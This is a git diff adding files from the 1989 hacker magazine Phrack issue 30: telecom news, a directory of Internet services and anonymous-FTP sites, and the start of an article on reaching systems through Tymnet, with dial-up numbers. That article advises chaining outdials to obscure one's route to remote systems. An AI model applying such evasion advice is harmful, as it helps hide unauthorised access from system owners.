+When the 152 available codes are exhausted, Bellcore will use a new plan for
+creating area codes.
+
+A total of 138 codes already are assigned.  Five of the remaining 14 codes are
+reserved for service access codes, and 9 are for geographic area codes.
+
+Under the current plan, a 0 or a 1 is used as the second digit while the first
+and last digits can range between 2 and 9.  Under the new plan the first digit
+will be between 2 and 9 and the following two digits will be numbers between 0
+and 9, McAlesse said.
+
+The new plan will create 640 potential area codes, he said.  Bellcore isn't
+predicting when the newly created codes will run out.
+
+"The growth in new services and increase in the number of telephones are
+exhausting the codes.  The biggest increases are cellular telephones, pagers,
+facsimile machines and new services that can have more than one number,"
+McAlesse said.
+
+The current unassigned codes include 210, 310, 410, 706, 810, 905, 909, 910 and
+917.  The Chicago area took the 708 code, and New Jersey will take 908.
+
+In the Chicago metropolitan area, the suburbs were switched from the 312 area
+code to the new 708 code.  Residents and businesses within the city limits
+retained the 312 code.
+
+Illinois Bell started preparing for the change two years ago with the
+announcements alerting business customers to change stationary and business
+cards, said Gloria Pope, an Illinois Bell spokeswoman.  Now the telco is
+targeting the residential market with billboard reminders and billing inserts.
+
+The cost of technically preparing for the new code, including labor, is
+expected to reach $15 million.  But Pope said that does not include mailings,
+public relations efforts and business packages designed to smooth out the
+transition.  The telco will absorb the cost with budgeted funds, and no rate
+increase is expected, she said.
+
+Modifying the network to recognize the new code started about six months ago
+with translation work.  Every central office in the Chicago Metropolitan area
+was adapted with a new foreign-area translator to accept the new code and route
+the calls correctly, said Audrey Brooks, area manager-Chicago translations.
+
+The long distance carriers were ready for the code's debut.  AT&T, US Sprint
+and MCI changed their computer systems to recognize the new code before the
+Chicago deadline.
+
+"We are anticipating a pretty smooth transfer," said Karen Rayl, U.S. Sprint
+spokeswoman.
+
+Businesses will need to adjust their PBX software, according to AT&T technical
+specialist Craig Hoopman.  "This could affect virtually every nationwide PBX,"
+he said.  Modern PBX's will take about 15 minutes to adjust while older
+switches could take four hours.  In many cases, customers can make the changes
+themselves, he said.
+_______________________________________________________________________________
+
+A New Coating Thwarts Chip Pirates                             November 7, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by John Markoff (New York Times)
+
+Several years ago, clever high-technology pirates removed a chip from a
+satellite-television descrambling device made by General Instrument
+Corporation, electronically siphoned out hidden decryption software and studied
+it to figure out a way to receive clear TV signals.
+
+When the company later tried to protect the chips by coating them with epoxy,
+the pirates simply developed a solvent to remove the protective seal, and stole
+the software again.
+
+Now government researchers at Lawrence Livermore National Laboratory, a weapons
+and energy research center in Livermore, California, have developed a special
+coating that protects the chip from attempts to pry out either the chip design
+or the information it contains.  In the semiconductor industry, a competitor's
+chip design can be copied through a process called reverse engineering, which
+might include determining the design through an electron microscope or by
+dissolving successive layers of the chip with a solvent.
+
+Already a number of government military and intelligence agencies are using the
+coating to protect circuits containing secure information.  The government has
+qualified 13 U.S. chip makers to apply the coating to chips used by certain
+government agencies.
+
+The Lawrence Livermore research, known as the Connoisseur Project, has
+developed a resin about the consistency of peanut butter that is injected into
+the cavity surrounding the chip after it has been manufactured.  The coating is
+heated and cured; The chip is then sealed with a protective lid.
+
+The special protective resin is opaque and resists solvents, heat, grinding and
+other techniques that have been developed for reverse engineering.
+
+A second-generation coating is being developed that will automatically destroy
+the chip when an attempt is made chemically to break through the protective
+layer.
+
+Another project at the laboratory is exploring even more advanced protection
+methods that will insert ultra-thin screens between the layers of a chip,
+making it harder to be penetrated.
+______________________________________________________________________________
+
+U.S. Firm Gets Hungarian Telephone Contract                    December 5, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Taken from the St. Louis Post-Dispatch (via New York Times News Service)
+
+U.S. West Inc., one of the seven regional Bell telephone companies, announced
+that it had signed an agreement with Hungary to build a mobile cellular
+telephone system in Budapest.
+
+The Hungarian cellular system will be the first such telephone network in
+Eastern Europe.
+
+Because of the shortage of telephones in their country, Hungarians are expected
+to use cellular telephones for basic home service, as well as mobile
+communications.
+
+For Hungary and the other Eastern European countries that have antiquated
+telephone systems, it will be faster and cheaper for the Government to deliver
+telephone service by cellular networks than it would be to rebuild the nation's
+entire telephone apparatus.
+
+A cellular telephone network transmits calls on radio waves to small receiving
+antennas, called "cell" sites, that relay calls to local phone systems.  The
+system to be built in Hungary will transmit calls from cellular phone to
+cellular phone and through the existing land-based telephone network.
+
+The system, which is scheduled to begin operation in the first quarter of 1991,
+will initially provide cellular communications to Budapest's 2.1 million
+residents.  Eventually, the system will serve all of Hungary, a nation of 10.6
+million.
+
+Hungary has 6.8 telephone lines for every 100 people, according to The World's
+Telephones, a statistical compilation produced by AT&T.  By comparison, the US
+has 48.1 lines for every 100 people.
+_____________________________________________________________________________
+
+1.  Phone Fun (November/December) -- Some students at Columbia University in
+    New York City have added a twist to that ancient annoyance, the chain
+    letter.  The students have taken advantage of the school's newly installed,
+    $15 million IBM/Rolm phone system's ability not only to store messages like
+    an answering machine, but also to take and receive messages and send them
+    -- with comments -- to a third party.
+
+    Last spring, brothers Anil and Ajay Dubey, both seniors, recorded a parody
+    of rapper Tone Loc's Top 10 single "Funky Cold Medina" and sent it to some
+    buddies.  Their friends then passed the recording along with comments, to
+    some other pals, who passed it on to other friends...  and so on, and so
+    on, and so on.  Eventually, the message ran more than ten minutes and
+    proved so popular that the phone mail system became overloaded and was
+    forced to shut down.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+2.  Get a "Sprint" VISA Card Today (November 14, 1989) -- U.S. Sprint will
+    begin mailing in December, a a Sprint VISA card, which will combine the
+    functionality of a long distance calling card, a credit card and an ATM
+    card.  Sprint will market the card which will be issued by State Street
+    Bank and Trust, in Boston.
+
+    Business travelers will receive a single bill that list all their travel
+    related expenses:  Hotel, meals and phone calls.  While payment for the
+    phone charges will be done through the regular Visa bill, call detail
+    reports will appear on Sprint's standard FONcard bill.  Taken from
+    Communications Week.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+3.  The Harpers Forum -- Harpers Magazine came up with an idea for how to
+    gather information about the phreak/hack modem community.  They set up shop
+    on The Well (a public access Unix and bulletin board) and invited any and
+    all hackers to join in their multiple discussion subboards.
+
+    The hackers involved were Acid Phreak, Bernie S., Cap'n Crunch, Cheshire
+    Catalyst, Emmanuel Goldstein, Knight Lightning, Michael Synergy (of Reality
+    Hackers Magazine), Phiber Optik, Piper, Sir Francis Drake, Taran King, and
+    many old TAP subscribers.
+
+    The Well is accessible through CompuServe's data network.  All charges for
+    using The Well by hackers were absorbed by Harpers.
+
+    There were many people on The Well posing as hackers to try and add to the
+    discussion, but it turns out that some of them like Adel Aide, were shoe
+    salesmen.  There were also a few security types, including Clifford Stoll
+    (author of The Cuckoo's Egg), and a reporter or two like Katie Hafner (who
+    writes a lot for Business Week).
+
+    The contents of the discussion and all related materials will be used in an
+    article in an upcoming issue of Harpers Magazine.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+4.  Phrozen Ghost has supposedly been arrested for crimes relating to hacking,
+    telecommunications fraud, and drugs.  No other details are known at this
+    time.  Information sent to PWN by Captain Crook.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+5.  SurveillanceCon '89 -- Tuc, Susan Thunder, and Prime Suspect all attended a
+    Security/Surveillance Convention in Washington DC recently at which both
+    Tuc and Susan Thunder gave presentations about computer security.  Tuc's
+    presentation dealt largely with bulletin boards like Ripco in Chicago and
+    newsletters like Phrack Inc.  Audio cassettes from all the speakers at this
+    convention are available for $9.00 each, however we at PWN have no
+    information about who to contact to purchase these recordings.
+_______________________________________________________________________________
+
diff --git a/phrack30/2.txt b/phrack30/2.txt
new file mode 100644
index 0000000..7ff5402
--- /dev/null
+++ b/phrack30/2.txt
@@ -0,0 +1,381 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 30, File #2 of 12
+
+                            Network Miscellany III
+                            ~~~~~~~~~~~~~~~~~~~~~~
+                                 By Taran King
+
+                         With Extra Special Thanks To
+
+                                 Dark OverLord
+
+                               December 24, 1989
+
+
+CARL
+~~~~
+The Colorado Alliance of Research Libraries, or CARL, is an on-line service
+providing information from its member libraries as well as select information
+databases.  The member libraries include Auraria, CU Health Sciences Center, CU
+Law Library, Denver Public Library, Denver University, Denver University Law
+School, Colorado School of Mines, University of Northern Colorado, University
+of Wyoming, Government Publications, plus about five community colleges, Regis
+College, Colorado State Publications, State Department of Education, Pikes Peak
+Library, MARMOT Library System, and Boulder Public Library.  The information
+databases include the following:  UnConver -- Article Access, "Facts,"
+Encyclopedia, Metro Denver Facts, Info Colorado, Boston Library Consortium,
+Library News, and New Journal Issues.
+
+CARL is available via Telnet at PAC.CARL.ORG (192.54.81.128) and is pretty
+clear to understand.  The Encyclopedia information database, unfortunately,
+requires a valid username on the system.
+
+
+COMPUSERVE ACCESS VIA INTERNET
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+You can access CompuServe via Telnet through the gateway/concentrator at
+CTS.MERIT.EDU (35.1.1.6) by typing "CompuServe" at the "Which Host?" prompt.
+
+CTS.MERIT.EDU (35.1.1.6) is a Cisco terminal server installed primarily for
+users of the Merit computer network in Michigan.  This machine has a bunch of
+serial lines going in each direction to/from a Merit Secondary Communications
+Processor (SCP), which is the entity that gives you the "Which Host?" prompt.
+
+Some other of the Merit services (like outbound Telnet from "Which Host?") have
+been intentionally limited so that they only work within Merit.  Part of this
+is apparently for reasons of accountability and security (no random hackers
+dialing in and hacking machines in New Zealand) and part is for access control
+(ports are scarce and services have costs so they try to limit who uses the
+thing to paying customers).
+
+CompuServe bills connections via this link as if it were via Telenet (which is
+EXPENSIVE!).  It's an X.25 connection somewhere at a decently fast speed.
+
+If you have particular questions about all of the various services that can be
+accessed through Merit, either through the terminal server at CTS.MERIT.EDU
+(35.1.1.6), Telneting directly into a Merit SCP or PCP, or via dial-up access,
+contact merit_computer_network@UM.CC.UMICH.EDU or INFO@MERIT on Bitnet.
+
+For more details about what can be accessed via CTS.MERIT.EDU, stay tuned to
+Network Miscellany for part IV in an upcoming issue of Phrack!
+
+
+DATE AND TIME
+~~~~~~~~~~~~~
+Here's an interesting little trick.  Just in case you are on some system
+without the ability to report what time it is by a command, connect via Telnet
+to port 13 of an Internet Unix system.  This gives you the time and date and
+then disconnects.  Some example systems of this include RUTGERS.EDU,
+MICA.BERKELEY.EDU, UCBVAX.BERKELEY.EDU, and PIKES.COLORADO.EDU (example:
+Telnet RUTGERS.EDU 13).
+
+
+FTP
+~~~
+File Transfer Protocol or FTP is a way to transfer data or text files over the
+Internet from remote sites.  The only problem is figuring out where something
+is that you want to get.
+
+The following is a list of sites accepting anonymous FTP user=anonymous,
+password=login.  It was compiled by Jon Granrose with the help of a number of
+contributors as well as a couple of lists that had been started.  If you have
+any comments, additions, or corrections, mail them to odin@UCSCB.UCSC.EDU or
+odin@ucscb.UUCP or 74036.3241@COMPUSERVE.COM.
+
+-------------------------------------------------------------------------------
+System name                IP Address      Comments
+-------------------------------------------------------------------------------
+a.cs.uiuc.edu              128.174.5.20    TeX, dvi2ps, gif, texx2.7, amiga
+accuvax.nwu.edu            129.105.49.1    PibTerm 4.1.3
+ahwahnee.stanford.edu      36.56.0.208     pcip interface specs
+ai.toronto.edu             128.100.1.65    SunOS4.0 SLIP beta,
+                                           R3 xwebster fixes
+albanycs.albany.edu        128.204.1.4     Best of comp.graphics
+allspice.lcs.mit.edu       18.26.0.115     RFC1056 (PCMAIL) stuff, MIT snmp
+ames.arc.nasa.gov          128.102.18.3    pcrrn, gnu grep
+arisia.xerox.com           13.1.100.206    lisp, tcp/ip, IDA sendmail kit
+arizona.edu                128.196.6.1     Icon, SR, SBProlog languages
+arthur.cs.purdue.edu       128.10.2.1      RCS, Purdue tech reports
+athena-dist.mit.edu        18.71.0.38      Hesiod name server, Kerberos, moira
+bitsy.mit.edu              18.72.0.3       MIT worm paper
+brownvm.brown.edu          128.148.128.40  MAC
+bu-cs.bu.edu               128.197.2.1     Telecom
+bu-it.bu.edu               128.197.2.40    Lots of interesting things.
+bugs.nosc.mil              128.49.0.1      Minix
+c.isi.edu                  26.3.0.103      info-ibmpc (Tenex)
+cadre.dsl.pittsburgh.edu   128.147.128.1   jove for the Mac
+camelot.berkeley.edu       128.32.149.18   "pmake", yet another parallel make
+cayuga.cs.rochester.edu    192.5.53.209    Xfig, LaTeX style, Jove,
+                                           NL-KR mail list
+celray.cs.yale.edu         128.36.0.25     ispell, dictionary
+charon.mit.edu             18.80.0.13      perl+patches, xdvi
+cheddar.cs.wisc.edu        128.105.2.113   Common Lisp stuff, X11 courier fonts
+cheops.cis.ohio-state.edu  128.146.8.62    comp.sources.*, alt.sources
+citi.umich.edu             35.1.128.16     pathalias, (not CITI MacIP), webster
+clutx.clarkson.edu         128.153.4.3     Turbo C stuff, net kit
+cmx.npac.syr.edu           128.230.7.8     Lots of stuff
+cod.nosc.mil               128.49.16.5     birdlist, PCstuff
+columbia.edu               10.3.0.89       NEST network simulation testbed
+crocus.waterloo.edu        129.97.128.6    STEVIE (vi-clone) in /u/grwalter/ftp
+cs.cmu.edu                 128.2.222.173   screen, msdos interrupt list, zoo
+                                           (in /afs/cs.cmu.edu/user/ralf/pub)
+cs.orst.edu                128.193.32.1    Xlisp
+cs.rochester.edu           192.5.53.209    See cayuga.cs.rochester.edu
+cs.utah.edu                128.110.4.21    A Tour of the Worm, amiga forth
+csc.ti.com                 128.247.159.141 Preliminary clx document
+cunixc.cc.columbia.edu     128.59.40.130   MM mailer, Kermit, CAP/KIP
+cygnusx1.cs.utk.edu        128.169.201.12  GCC, MM, Scheme
+dartvax.dartmouth.edu      129.170.16.4    ??
+decwrl.dec.com             128.45.1.1      No FTP; gatekeeper.dec.com
+devvax.tn.cornell.edu      192.35.82.200   tn3270, gated
+drizzle.cs.uoregon.edu     128.223.4.1     raytracing archive (markv)
+dsrgsun.ces.cwru.edu       129.22.16.2     Minix, TOS atariST gcc from bammi
+ecla.usc.edu               26.21.0.65      mg emacs
+elbereth.rutgers.edu       128.6.4.61      /pub
+emx.utexas.edu             128.83.1.33     /net.directory
+expo.lcs.mit.edu           18.30.0.212     a home of X, portable bitmaps
+f.ms.uky.edu               128.163.128.6   Lots of interesting things
+flash.bellcore.com         128.96.32.20    Karn's RFC & IEN coll,
+                                           Latest NET bits
+ftp.ncsa.uiuc.edu          128.174.20.50   NCSA Telnet source, Mathematica
+gatekeeper.dec.com         128.45.9.52     X11, recipes, cron, map,
+                                           Larry Wall stuff
+ghostwheel.andrew.cmu.edu  128.2.35.1      Hershey fonts
+giza.cis.ohio-state.edu    128.146.8.61    X11R3, PEX
+gpu.utcs.toronto.edu       128.100.100.1   Lots of stuff, pd ksh
+grape.ecs.clarkson.edu     128.153.13.196  Opus BBS, ms-dos, graphics
+gregorio.stanford.edu      36.8.0.11       vmtp-ip, ip-multicast
+gtss.gatech.edu            128.61.4.1      amiga rexx stuff
+hamlet.caltech.edu         192.12.19.3     Nansi (VMS)
+hanauma.stanford.edu       36.51.0.16      Vplot graphical system
+him1.cc.umich.edu          35.1.1.43       atari st (cd PC7:)
+hipl.psych.nyu.edu         128.122.132.2   Jove in pub (v4.9 is latest)
+hogg.cc.uoregon.edu        128.223.20.5    NorthWestNet site info
+hotel.cis.ksu.edu          129.130.10.12   XBBS, msdos, U3G toolkit
+hubcap.clemson.edu         192.5.219.1     GIF files, RFCs
+husc6.harvard.edu          128.103.1.56    pcip, appleII archives, uumap copy
+                                           and soon the parts of the ucb tahoe
+                                           tape that are marked not-at&t
+icec.andrew.cmu.edu        128.223.4.1     CMU Tutor, ICEC
+ics.uci.edu                128.195.0.1     perfect hash function gen., web-to-c
+indri.primate.wisc.edu     128.104.230.11  Macintosh Trans{Skel, Display, Edit}
+ix1.cc.utexas.edu          128.83.1.21     amiga
+ix2.cc.utexas.edu          128.83.1.29     amiga
+iuvax.cs.indiana.edu       129.79.254.192  unix arc et al
+j.cc.purdue.edu            128.210.0.3     c.s. {unix, x, amiga}, elm, uupc
+jpl-devvax.jpl.nasa.gov    128.149.8.43    perl author
+june.cs.washington.edu     128.95.1.4      TeXhax, dviapollo, SmallTalk, web2c
+kampi.hut.fi               128.214.3.9     DES routines (unrestricted)
+kolvi.hut.fi               128.214.3.7     Ham radio (FINLAND)
+kuhub.cc.ukans.edu         129.237.1.10    VMS news
+labrea.stanford.edu        36.8.0.47       dvips, paranoia
+lambda.lanl.gov            128.165.4.4     Toolpack/1 for math sw in f77
+lancaster.andrew.cmu.edu   128.2.13.21     CMU PCIP, RFC1073 telnetd,
+                                           RFC1048 bootp
+larry.cs.washington.edu    128.95.1.7      Poker
+lbl-csam.arpa              128.3.254.6     See rtsg.ee.lbl.gov
+linc.cis.upenn.edu         128.91.2.8      psfig for ditroff, TeX
+llnl-winken.llnl.gov       128.115.14.1    comp.sources.misc
+louie.udel.edu             128.175.1.3     net.exe, minix, NORD<>LINK, MH,
+                                           amiga
+m9-520-1.mit.edu           18.80.0.45      Xim (X image viewer)
+maxwell.physics.purdue.edu 128.46.135.3    /pub/bible.tar.Z
+mailrus.cc.umich.edu       35.1.1.26       This list, unix arc, apollo stuff
+megaron.arizona.edu        192.12.69.1     See arizona.edu
+mimsy.umd.edu              128.8.128.8     declarative languages bib, SLIP
+monk.proteon.com           128.185.123.16  cc:mail to smtp gateway
+mordred.cs.purdue.edu      128.10.2.2      X11R3
+ncsuvx.ncsu.edu            128.109.153.1   Hack, Moria, Empire, Ogre
+net1.ucsd.edu              128.54.0.10     macintosh (tenex)
+nic.mr.net                 192.12.250.5    Minnesota Regional Net traffic data
+nic.ddn.mil                10.0.0.51       RFC, other network info in NETINFO:
+nis.nsf.net                35.1.1.48       Merit info, NSFnet Link Letter
+nisc.nyser.net             192.33.4.10     Nysernet, IETF, GOSIP
+nl.cs.cmu.edu              128.2.222.56    Fuzzy Pixmap 0.84 in /usr/mlm/ftp
+oddjob.uchicago.edu        128.135.4.2     NNTP, Sendmail, utils,
+                                           Ethernet stuff
+omnigate.clarkson.edu      128.153.4.2     PS maps of the Domain Name system.
+parcvax.xerox.com          13.1.100.206    See arisia.xerox.com
+panarea.usc.edu            128.125.3.54    Archive for "maps"
+pawl.rpi.edu               128.113.10.2    DVI stuff, Atari ST, vi for dos
+plains.nodak.edu           192.33.18.50    ASCII pics, /pub/picture
+po1.andrew.cmu.edu         128.2.11.131    ??
+po2.andrew.cmu.edu         128.2.249.105   ??
+postgres.berkeley.edu      128.32.149.1    University INGRES,
+prep.ai.mit.edu            128.52.32.14    GNU, MIT C Scheme, gnu e?grep
+radio.astro.utoronto.ca    128.100.75.4    UFGATE, msdos, lots
+rascal.ics.utexas.edu      128.83.144.1    KCL, MAXIMA, GCC-386,
+                                           BoyerMoore prover
+relgyro.stanford.edu       36.64.0.50      sunrast-to-pc
+riacs.edu                  128.102.16.8    SLIP
+ringo.rutgers.edu          128.6.5.77      Omega sources
+rtsg.ee.lbl.gov            128.3.254.68    flex
+sally.cs.utexas.edu                        Networking stuff
+sbcs.sunysb.edu            128.48.2.3      sun raster tools
+scam.berkeley.edu          128.32.138.1    X sources, etc.
+science.utah.edu           118.110.192.2   TeX things (tenex)
+score.stanford.edu         36.8.0.46       TexHax, Atari (tenex)
+sh.cs.net                  192.31.103.3    Misc
+shambhala.berkeley.edu                     xrn
+sics.se                    192.16.123.90   Ham radio (SWEDEN)
+simtel20.arpa              26.0.0.74       See wsmr-simtel20.army.mil
+spam.istc.sri.com          128.18.4.3      Gnu, more
+sphere.mast.ohio-state.edu 128.146.7.200   phone (with bugs fixed)
+squid.cs.ucla.edu          128.97.16.28    soc.med.aids
+sri-nic.arpa               10.0.0.51       See nic.ddn.mil
+ssyx.ucsc.edu              128.114.133.1   atari, amiga, gifs
+sumex.stanford.edu         36.44.0.6       mac archives, Mycin (SUN4), imap
+sumex-2060.stanford.edu    36.45.0.87      Old home of mac archives (tenex)
+sun.cnuce.cnr.it           192.12.192.4    atalk, ka9q
+sun.soe.clarkson.edu       128.153.12.3    Packet Driver, X11 fonts, TeX
+surya.waterloo.edu         129.97.129.72   gifs, tiff format, gif2ras
+stolaf.edu                 130.71.128.1    news, anime, bitmaps
+svax.cs.cornell.edu        128.84.254.2    TransFig, Fig-FS, NetHack
+swan.ulowell.edu           129.63.224.1    sendmail, amiga, music, c.s. unix
+thyme.lcs.mit.edu          18.26.0.94      SUPDUP
+titan.rice.edu             128.42.1.30     sun-spots, amiga ispell
+tmc.edu                    128.249.1.1     FUBBS bbs list
+topaz.rutgers.edu          128.6.4.194     amiga
+trantor.harris-atd.com     26.13.0.98      contool, chuck@%s's tools
+trantor.umd.edu            128.8.1.14      Network Time Protocol(NTP),
+                                           info-amiga
+trwind.ind.trw.com         129.4.16.70     Turbo C src for net.exe
+tumtum.cs.umd.edu          128.8.129.49    NeWS pd software
+tut.cis.ohio-state.edu     128.146.8.60    GNU, lots of interesting things
+ucbarpa.berkeley.edu       128.32.130.11   tn3270, pub/4.3
+ucbvax.berkeley.edu        128.32.149.36   nntp, gnews, awm, empire
+ucdavis.ucdavis.edu        128.120.2.1     ??
+ucsd.edu                   128.54.16.1u    KA9Q archives, packet driver
+umn-cs.cs.umn.edu          128.101.224.1   vectrex, mac, unix-pc
+unmvax.unm.edu             129.24.12.128   getmaps,
+unocss.unl.edu             129.93.1.11     alt.sex, motss
+utadnx.cc.utexas.edu       128.83.1.26     VMS sources (zetaps, laser, sxlps)
+uunet.uu.net               192.12.141.129  usenet archives, much more
+ux.acss.umn.edu            128.101.63.2    usenix 87 archives
+uxa.cso.uiuc.edu           128.174.2.1     mac, pcsig
+uxc.cso.uiuc.edu           128.174.5.50    Games, misc
+uxe.cso.uiuc.edu           128.174.5.54    amiga/Fish disks, PC-SIG 1-499
+vax.ftp.com                128.127.25.100  FTP software, inc.
+venera.isi.edu             128.9.0.32      statspy (NNstat)
+venus.ycc.yale.edu         130.132.1.5     SBTeX
+vgr.brl.mil                128.63.4.4      bsd ping + record route
+venera.isi.edu             128.9.0.32      GNU Chess
+watmath.waterloo.edu       129.97.128.1    Lots of stuff
+wsmr-simtel20.army.mil     26.0.0.74       MS-DOS, Unix, CP/M, Mac, lots!
+                                           (tenex)
+xanth.cs.odu.edu           128.82.8.1      c.srcs.{x, unix, misc, games,
+                                           amiga}, X10R4
+zaphod.ncsa.uiuc.edu       128.174.20.50   NCSA Telnet source, binaries
+z.andrew.cmu.edu           128.2.30.8      bugfixar + div
+
+
+MELVYL ONLINE CATALOG
+~~~~~~~~~~~~~~~~~~~~~
+This service is provided by the University of California schools.  It is
+available via Telnet by connecting to MELVYL.UCOP.EDU (31.1.0.1).  It basically
+provides information searching capabilities and provides literary sources where
+the "keyword" that you used may be found.  It is relatively self-explanatory.
+
+
+NAMESERVERS
+~~~~~~~~~~~
+By connecting to port 101 on certain Internet systems, you have connected to
+the nameserver of that domain.  To get a list of all of the subdomains of the
+main domain, type ALL.  A sample system is VIOLET.BERKELEY.EDU but be
+forewarned that the output from typing ALL is *EXTREMELY* long on this
+particular system! (Example: Telnet VIOLET.BERKELEY.EDU 101).
+
+
+PUBLIC ACCESS UNIX INFORMATION
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+For those of you that are still interested in more information on the Public
+Access Unix systems that were listed in Network Miscellany II featured in
+Phrack 29, here are a few more details.  For specific information concerning
+the nodes discussed, refer to the previous article.
+
+For those of you who are not local to a Public Access Unix system, Portal can
+be reached via PC-Pursuit for $25 a month and a $10 access fee for "portal"
+(off-peak).  For information, contact John Little (jel@CUP.PORTAL.COM).
+
+
+The Big Electric Cat (dasys1.UUCP) claims to be cheaper than most well-
+connected public sites.  They have special billing for "organizational"
+accounts if you're interested and their standard rate is $5 a month for an
+account (no time restrictions).  The Big Electric Cat offers a superset of the
+USENET newsgroups as well as unrestricted mail (!), a simplified set of prompts
+for most system functions, games, and several other features
+
+
+The World (WORLD.STD.COM) in Brookline, MA (Boston) is a Sun4/280 running
+Sun/OS 4.0.3 (Unix.)  They offer electronic mail (to most anyplace), USENET,
+ClariNet and general Unix access.  They dial UUNET and other sites frequently.
+
+To create an account you just dial (617)739-WRLD (9753) and login as user "new"
+(the login prompt gives instructions).  They ask for some info (name, address,
+etc.) and a MasterCard or Visa account.
+
+  Rates for The World
+  ~~~~~~~~~~~~~~~~~~~
+  All times are East Coast, USA.
+
+  INITIAL SIGN-UP
+  $25.00 fee, applied to first month's charges.
+  BASIC ACCESS RATES
+         8AM-6PM        $8.00/hour (Monday thru Friday)
+         6PM-12M        $5.00/hour
+         12M-8AM        $2.50/hour
+  Weekends and holidays, 8AM-12M, $5/hour.
+
+  Disk Quota
+  ~~~~~~~~~~
+  A "byte" is equivalent to one character of storage.
+  A disk block is 1024 bytes.
+         First 512 disk blocks              No Charge
+         Additional Quota                   $0.01/block/month
+                                            (approx. $10/MB/month)
+  Note that disk charges are based on your requested disk quota (system imposed
+  limit on your usage) and not your actual usage. Disk quota charges are
+  pro-rated.
+
+  Electronic Mail
+  ~~~~~~~~~~~~~~~
+  No charge for electronic mail between users of The World.  No charge for
+  first 512 blocks of mail per month.  $0.01 per block of mail thereafter in
+  any given month (approx. $10/MB/month).
+
+  CPU Usage
+  ~~~~~~~~~
+  In general, they do not charge for these resources for typical accounts
+  interested in electronic communications.  Customers who wish to use their
+  system for compute or memory intensive applications should contact their
+  office for rates.
+
+  USENET
+  ~~~~~~
+  Local usage, no charge.  Network usage, no charge at this time.
+
+  Printing And Fax
+  ~~~~~~~~~~~~~~~~
+  To be announced.
+
+  Upload or Download Software
+  ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+  No additional charge.
+
+
+UNIVERSITY OF CALIFORNIA AT BERKELEY NETWORK INFORMATION
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+This is a service which I, personally, have found to be extremely useful.  If
+you need network information on virtually any system, connect to the University
+of California at Berkeley Network Information at JADE.BERKELEY.EDU Port 117
+(example:  Telnet JADE.BERKELEY.EDU 117).  Once you are logged into the system
+automatically, it prompts you for a command or type "?" for a list of commands.
+The help menu is relatively easy to understand.  You can get Bitnet network
+table listings or Internet numerical addresses or Internet mail exchanger
+listings or UUCP node information or UUCP node paths plus more.  It's very
+useful in case you're having difficulty sending mail to a particular node from
+your own node or if you're trying to connect to a system via FTP or Telnet that
+your system doesn't recognize (i.e. get the numerical address from the server
+and FTP or Telnet to the numerical address).
+_______________________________________________________________________________
diff --git a/phrack30/3.txt b/phrack30/3.txt
new file mode 100644
index 0000000..557b1fa
--- /dev/null
+++ b/phrack30/3.txt
@@ -0,0 +1,359 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 30, File #3 of 12
+
+               [-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-]
+               [-]                                          [-]
+               [-]             Hacking & Tymnet             [-]
+               [-]                                          [-]
+               [-]                    by                    [-]
+               [-]                                          [-]
+               [-]                Synthecide                [-]
+               [-]                                          [-]
+               [-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-]
+
+
+There are literally hundreds of systems connected to some of these larger
+networks, like Tymnet and Telenet.  Navigation around these networks is very
+simple, and usually well explained in their on-line documentation.
+Furthermore, some systems will actually tell you what is connected and how to
+get to it.  In the case of Tymnet, after dialing in, at the log in prompt, type
+"information" for the on-line documentation.
+
+Accessing systems through networks is as simple as providing an address for it
+to connect to.  The best way to learn about the addresses and how to do things
+on a network is to read "A Novice's Guide to Hacking (1989 Edition)" which was
+in Issue 22, File 4 of 12, Volume Two (December 23, 1988).  Some points are
+re-iterated here.
+
+Once on a network, you provide the NUA (network user address) of the system you
+wish to connect to.  NUAs are strings of 15 digits, broken up in to 3 fields,
+the NETWORK ADDRESS, the AREA PREFIX, and the DNIC.  Each field has 5 digits,
+and are left padded with 0's where necessary.
+
+The DNIC determines which network to take the address from.  Tymnet, for
+example, is 03106. 03110 is Telenet.
+
+The AREA PREFIX and NETWORK ADDRESS determine the connection point.  By
+providing the address of the system that you wish to connect to, you will be
+accessing it through the net... as if you were calling it directly.  Obviously,
+then, this provides one more level of security for access.
+
+By connecting to an outdial, you can increase again the level of security you
+enjoy, by using the outdial in that area to connect to the remote system.
+
+Addendum -- Accessing Tymnet Over Local Packet Networks
+
+This is just another way to get that extra step and/or bypass other routes.
+This table is copied from Tymnet's on-line information.  As said earlier, it's
+a great resource, this on-line information!
+
+                                 BELL ATLANTIC
+
+  NODE    CITY                  STATE           SPEED    ACCESS NUMBER  NTWK
+  ----   -------------------    --------------  ------   ------------   ----
+  03526   DOVER                 DELAWARE        300/2400 302/734-9465   @PDN
+  03526   GEORGETOWN            DELAWARE        300/2400 302/856-7055   @PDN
+  03526   NEWARK                DELAWARE        300/2400 302/366-0800   @PDN
+  03526   WILMINGTON            DELAWARE        300/1200 302/428-0030   @PDN
+  03526   WILMINGTON            DELAWARE        2400     302/655-1144   @PDN
+
+
+  06254   WASHINGTON            DIST. OF COL.   300/1200 202/479-7214   @PDN
+  06254   WASHINGTON (MIDTOWN)  DIST. OF COL.   2400     202/785-1688   @PDN
+  06254   WASHINGTON (DOWNTOWN) DIST. OF COL.   300/1200 202/393-6003   @PDN
+  06254   WASHINGTON (MIDTOWN)  DIST. OF COL.   300/1200 202/293-4641   @PDN
+  06254   WASHINGTON            DIST. OF COL.   300/1200 202/546-5549   @PDN
+  06254   WASHINGTON            DIST. OF COL.   300/1200 202/328-0619   @PDN
+
+  06254   BETHESDA              MARYLAND        300/1200  301/986-9942  @PDN
+  06254   COLESVILLE            MARYLAND        300/2400  301/989-9324  @PDN
